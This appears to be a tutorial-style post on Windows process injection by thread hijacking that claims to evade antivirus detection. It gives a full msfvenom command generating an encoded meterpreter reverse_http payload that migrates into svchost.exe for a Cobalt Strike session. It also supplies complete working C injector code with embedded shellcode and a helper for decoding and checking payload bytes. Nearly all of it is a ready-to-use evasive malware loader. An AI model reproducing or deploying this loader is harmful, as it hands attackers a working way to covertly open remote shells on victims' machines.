Screenshot of the result
Undetected as of: 2021-10-24
Key API: SetThreadContext, used to point the thread's EIP at the shellcode
Procedure
1. Create a process
2. Suspend the process
3. Allocate memory in it and write the shellcode
4. Change the EIP pointer so it points at the shellcode
5. Resume the suspended thread; the shellcode runs
The EIP register holds the address of the next instruction the CPU will fetch; the CPU reads the instruction it is about to execute through EIP. After each instruction completes, EIP advances to the following instruction (or is set to the target address on a jump or call). A suspended thread's registers are saved in its CONTEXT, so overwriting the saved EIP with SetThreadContext makes the thread continue at any address we choose, here the shellcode buffer, when it is resumed.
Generating the shellcode payload
Generate the shellcode with MSF; the session comes online in CS. Module: windows/meterpreter/reverse_http
msfvenom -p windows/meterpreter/reverse_http LHOST=127.0.0.1 LPORT=87 -e x86/shikata_ga_nai -i 5 -b '\x00' PrependMigrate=true PrependMigrateProc=svchost.exe -f c -o Payload.c
PrependMigrate=true PrependMigrateProc=svchost.exe
These two options prepend a migration stub to the payload: it spawns a new svchost.exe process and moves the shell into it before the stager runs, so the session no longer depends on the injected calc process.
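Two practical points about the Payload.c output: msfvenom with -f c emits a multi-line "\x.." string literal that has to be decoded (or pasted verbatim) and whose byte count the injector must know, and the -b '\x00' filter only matters if the bytes are ever handled as a NUL-terminated C string. The helper below is an added example, not code from the original post or from Metasploit: it decodes a msfvenom-style C literal into raw bytes and reports the first byte that appears in a bad-character set. SAMPLE is a constructed fragment in that format containing the first 12 bytes of the calc shellcode used later on this page, wrapped across two segments the way msfvenom wraps long payloads.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample in the shape msfvenom -f c emits: the first 12 bytes of the
   calc shellcode from this page, split across two "..." segments the way
   msfvenom wraps long payloads. */
static const char SAMPLE[] =
    "unsigned char buf[] = \n"
    "\"\\x55\\x8B\\xEC\\x83\\xEC\\x20\\x64\\xA1\"\n"
    "\"\\x30\\x00\\x00\\x00\";\n";

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode the string literal(s) in a -f c fragment into raw bytes. Adjacent
   "..." segments are concatenated, as the C compiler would do. Returns the
   byte count, or -1 on a malformed escape, an unterminated segment, or if
   the output buffer is too small. */
long decode_c_literal(const char *text, uint8_t *out, size_t cap) {
    size_t n = 0;
    const char *p = strchr(text, '"');
    if (!p) return -1;
    for (;;) {
        p++;                                   /* past the opening quote */
        while (*p && *p != '"') {
            int b;
            if (*p == '\\') {
                p++;
                if (*p == 'x') {
                    int hi = hexval((unsigned char)p[1]);
                    int lo = hi < 0 ? -1 : hexval((unsigned char)p[2]);
                    if (hi < 0 || lo < 0) return -1;
                    b = hi * 16 + lo;
                    p += 3;
                } else if (*p == '\\' || *p == '"') {
                    b = (unsigned char)*p++;
                } else {
                    return -1;                 /* escape form msfvenom never emits */
                }
            } else {
                b = (unsigned char)*p++;
            }
            if (n >= cap) return -1;
            out[n++] = (uint8_t)b;
        }
        if (*p != '"') return -1;              /* ran off the end of the text */
        p++;
        while (*p == ' ' || *p == '\t' || *p == '\r' || *p == '\n') p++;
        if (*p != '"') break;                  /* no further segment: done */
    }
    return (long)n;
}

/* Index of the first byte that appears in bad[], or -1 if the buffer is clean. */
long find_bad_char(const uint8_t *buf, size_t len, const uint8_t *bad, size_t nbad) {
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) return (long)i;
    return -1;
}

/* Helpers over SAMPLE so results can be checked without re-declaring buffers. */
long sample_length(void) {
    uint8_t buf[64];
    return decode_c_literal(SAMPLE, buf, sizeof buf);
}
int sample_byte(size_t i) {
    uint8_t buf[64];
    long n = decode_c_literal(SAMPLE, buf, sizeof buf);
    return (n < 0 || (long)i >= n) ? -1 : buf[i];
}
long sample_first_nul(void) {
    uint8_t buf[64];
    const uint8_t bad[] = { 0x00 };
    long n = decode_c_literal(SAMPLE, buf, sizeof buf);
    return n < 0 ? -2 : find_bad_char(buf, (size_t)n, bad, 1);
}

int main(void) {
    printf("decoded %ld bytes; first NUL byte at offset %ld\n",
           sample_length(), sample_first_nul());
    return 0;
}
```

The injector on this page copies the buffer with sizeof(shellcode), so embedded NUL bytes survive (the calc shellcode has its first one at offset 9), which is why that shellcode works without any -b filtering. The filter becomes necessary the moment the bytes pass through strlen, strcpy or any other string-handling code, and the check above is a cheap way to confirm a generated payload really is free of the characters you excluded.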
Implementation
#include <Windows.h>
#include <stdio.h>

#ifdef _WIN64
#error "Build this as x86: the shellcode below and the CONTEXT.Eip field are 32-bit only"
#endif

// Calculator-popping test shellcode (x86: walks the PEB to kernel32, calls WinExec("calc.exe")).
// Swap in the buffer from the Payload.c generated above to use the real payload.
unsigned char shellcode[] = "\x55\x8B\xEC\x83\xEC\x20\x64\xA1\x30\x00\x00\x00\x8B\x40\x0C\x8B\x40\x1C\x8B\x00\x8B\x00\x8B\x40\x08\xC7\x45\xFC\x00\x00\x00\x00\xC7\x45\xF8\x00\x00\x00\x00\xC7\x45\xF4\x00\x00\x00\x00\x8B\x58\x3C\x8D\x1C\x18\x8B\x5B\x78\x8D\x14\x18\x8B\x5A\x1C\x8D\x1C\x18\x89\x5D\xFC\x8B\x5A\x20\x8D\x1C\x18\x89\x5D\xF8\x8B\x5A\x24\x8D\x1C\x18\x89\x5D\xF4\x8B\x7A\x18\x33\xC9\x8B\x75\xF8\x8B\x1C\x8E\x8D\x1C\x18\x8B\x1B\x81\xFB\x57\x69\x6E\x45\x74\x03\x41\xEB\xED\x8B\x5D\xF4\x33\xD2\x66\x8B\x14\x4B\x8B\x5D\xFC\x8B\x1C\x93\x8D\x04\x18\xEB\x09\x63\x61\x6C\x63\x2E\x65\x78\x65\x00\xE8\x00\x00\x00\x00\x5B\x83\xEB\x0E\x6A\x05\x53\xFF\xD0\x8B\xE5\x5D\xC3";

int main(int argc, char const *argv[])
{
    STARTUPINFOA si = { 0 };
    si.cb = sizeof(si);
    PROCESS_INFORMATION pi = { 0 };
    char cmdline[] = "calc";   // CreateProcess may modify this buffer, so it must not be a string literal

    // 1+2. Create the host process with its primary thread suspended from the start. Same effect as
    //      "create, then SuspendThread", without the race in which the thread runs before the suspend lands.
    if (!CreateProcessA(NULL, cmdline, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi)) {
        printf("CreateProcessA failed: %lu\n", GetLastError());
        return 1;
    }
    // 3. Allocate an executable region in the target and copy the shellcode into it
    LPVOID lpBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_FULL;
    if (!lpBuffer ||
        !WriteProcessMemory(pi.hProcess, lpBuffer, shellcode, sizeof(shellcode), NULL) ||
        !GetThreadContext(pi.hThread, &ctx)) {      // 4a. read the suspended thread's saved registers
        printf("injection failed: %lu\n", GetLastError());
        TerminateProcess(pi.hProcess, 1);
        return 1;
    }
    // 4b. Point EIP at the shellcode. Eip is a 32-bit field, so the cast is to DWORD, not DWORD64
    ctx.Eip = (DWORD)(DWORD_PTR)lpBuffer;
    if (!SetThreadContext(pi.hThread, &ctx)) {
        printf("SetThreadContext failed: %lu\n", GetLastError());
        TerminateProcess(pi.hProcess, 1);
        return 1;
    }
    // 5. Resume: the thread now starts executing at the shellcode instead of calc's entry point
    ResumeThread(pi.hThread);
    Sleep(800);   // give the shellcode time to run (with the MSF payload, to migrate into svchost.exe)
    TerminateThread(pi.hThread, 0);   // then kill the hijacked calc thread
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}
Execution flow
Create a calculator process, suspend it, inject the shellcode into calc, resume it so the shellcode executes, migrate the shell into svchost.exe, then terminate the calc thread; the session comes online in CS.